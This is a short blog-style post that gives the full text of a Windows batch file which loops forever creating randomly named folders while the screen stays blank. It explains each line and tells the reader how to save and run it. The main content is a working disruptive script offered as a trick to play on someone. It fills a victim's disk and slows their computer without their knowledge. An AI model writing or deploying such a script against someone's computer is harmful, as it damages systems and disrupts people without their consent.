1. Open notepad and type :
@echo off
:top
md %random%
goto top
2. Save as anything.bat
Result:@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creates folders with random names. goto top – return to label :top, and initiates an
infinite loop.
No comments:
Post a Comment